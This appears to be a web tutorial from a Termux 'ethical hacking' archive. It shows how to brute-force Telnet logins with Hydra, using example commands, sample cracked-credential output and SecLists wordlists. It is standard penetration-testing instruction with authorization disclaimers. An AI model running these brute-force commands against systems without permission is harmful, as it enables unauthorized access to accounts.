Telnet, a protocol designed for remote access, is widely recognized for its lack of encryption, which makes it vulnerable to attacks. Despite being largely replaced by more secure alternatives like SSH, Telnet is still in use on many legacy systems. This makes it an attractive target for penetration testers aiming to assess the security of older systems.
In this guide, we’ll show you how to use Hydra in Termux to crack Telnet passwords. Hydra is an efficient tool for brute-forcing login credentials for many protocols, including Telnet. As always, ensure that you have explicit permission before conducting any testing.
Important: Unauthorized brute-forcing or hacking attempts are illegal. This tutorial is for educational purposes and should only be used on systems you are authorized to test.
Table of Contents
Step 1: Installing Hydra in Termux
Before you can crack Telnet passwords, you need to install Hydra in Termux. Hydra is available in Termux’s package repository, making installation quick and easy.
Update Termux by running the following command:
pkg update && pkg upgrade Explanation: This command ensures that all installed packages in Termux are up to date. This is crucial for system stability when installing new tools like Hydra.
Output:
Reading package lists... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.Once Termux is up to date, you’re ready to install Hydra.
Install Hydra with:
pkg install hydra Explanation: This command installs Hydra, a powerful password-cracking tool that supports protocols like Telnet. Hydra allows you to perform brute-force attacks on remote systems.
Output:
The following NEW packages will be installed:
hydra
Need to get 1,234 kB of archives.
After this operation, 4,567 kB of additional disk space will be used.Hydra is now installed and ready for Telnet brute-forcing.
Step 2: Cracking Telnet Passwords with Hydra
Hydra’s command structure is simple, yet highly effective. To brute-force Telnet login credentials, the command you need is:
hydra -l <username> -P <password_list> telnet://<target_ip>-l <username>: Specifies the username you want to target.-P <password_list>: Points to the password list file you’ll use.telnet://<target_ip>: The IP address of the Telnet server you’re attacking.
For example, if the Telnet server IP is 192.168.1.10, and the username is admin with a password list called passwords.txt, the command would be:
hydra -l admin -P passwords.txt telnet://192.168.1.10Explanation: This command tells Hydra to brute-force the username admin on the Telnet server at 192.168.1.10 using each password in the passwords.txt file.
Output:
Hydra v9.1 starting at 2024-10-05 16:12:34
[DATA] attacking telnet://192.168.1.10:23/
[23][telnet] host: 192.168.1.10 login: admin password: 123456
1 of 1 target successfully completed, 1 valid password foundExplanation: Hydra found that the password 123456 was valid for the admin user on the Telnet server. The brute-force attack was successful, and a valid login was identified.
Step 3: Testing Multiple Usernames and Password Lists
If you need to test multiple usernames and passwords, Hydra can use lists for both. This is especially useful when you’re unsure of the exact credentials.
hydra -L usernames.txt -P passwords.txt telnet://192.168.1.10-L usernames.txt: Specifies a list of usernames for Hydra to try.-P passwords.txt: Specifies a list of passwords to be used.
Explanation: This command tells Hydra to try each username in usernames.txt against each password in passwords.txt on the Telnet server at 192.168.1.10.
Output:
[DATA] attacking telnet://192.168.1.10:23/
[23][telnet] host: 192.168.1.10 login: user1 password: password123
[23][telnet] host: 192.168.1.10 login: admin password: 123456In this example, Hydra identified two valid login credentials for the Telnet server: user1/password123 and admin/123456.
Step 4: Using Wordlists for Telnet Password Cracking
To improve your chances of success, it’s important to use a comprehensive password list. There are many publicly available wordlists tailored for brute-forcing attacks. One such collection is SecLists (External Link), which contains a wide range of password lists that can be used in Hydra.
To download and use a wordlist from SecLists, follow these steps:
Clone the SecLists repository:
git clone https://github.com/danielmiessler/SecLists.gitNavigate to the password list directory and use it in your Hydra command:
hydra -l admin -P SecLists/Passwords/Common-Credentials/10k-most-common.txt telnet://192.168.1.10Explanation: This command uses a common password list from SecLists to brute-force Telnet credentials for the username admin.
Internal and External Resources
For more information on securing your Termux environment, check out our guide on Tips for Securing Your Termux Environment (Internal Link). If you’re interested in other penetration testing techniques, our article on Performing Basic Network Scans with Nmap in Termux (Internal Link) is a great next step.
To further your knowledge of secure remote access, consider reading about alternatives to Telnet like OpenSSH (External Link), which offers more secure remote login options.
Conclusion
Cracking Telnet passwords with Hydra in Termux is a useful method for penetration testers working on older or less secure systems. Despite its vulnerabilities, Telnet is still used in many environments, which makes it a valuable protocol to test for weak or default credentials.
Remember, this tutorial is intended for ethical hacking and educational purposes. Unauthorized testing is illegal. For more penetration testing tutorials, visit our Termux Ethical Hacking Archive.
Ethical Hacking Archive
Welcome to the Termux Ethical Hacking Archive. This dedicated archive is your go-to resource for everything related to ethical hacking using Termux, a powerful terminal emulator for Android. Whether you’re a beginner or looking to deepen your expertise, this archive provides a complete collection of articles to guide you through the essential aspects of ethical hacking with Termux.
